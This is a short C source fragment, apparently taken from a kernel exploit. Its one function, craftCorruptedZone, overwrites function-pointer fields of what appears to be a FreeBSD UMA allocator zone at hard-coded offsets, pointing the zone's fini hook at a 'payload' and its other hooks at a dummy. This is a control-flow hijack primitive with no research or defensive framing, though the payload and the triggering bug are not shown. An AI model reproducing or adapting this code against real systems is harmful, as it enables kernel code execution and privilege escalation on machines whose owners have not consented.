
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 void* dummy ;
 void* payload ;

void craftCorruptedZone(void *zone) {
 void **uz_slab = (void **)(zone + 200);
 void **uz_dtor = (void **)(zone + 216);
 void **uz_fini = (void **)(zone + 232);
 void **uz_import = (void **)(zone + 240);
 void **uz_release = (void **)(zone + 248);
 *uz_slab = dummy;
 *uz_fini = payload;
 *uz_import = dummy;
 *uz_release = dummy;
}
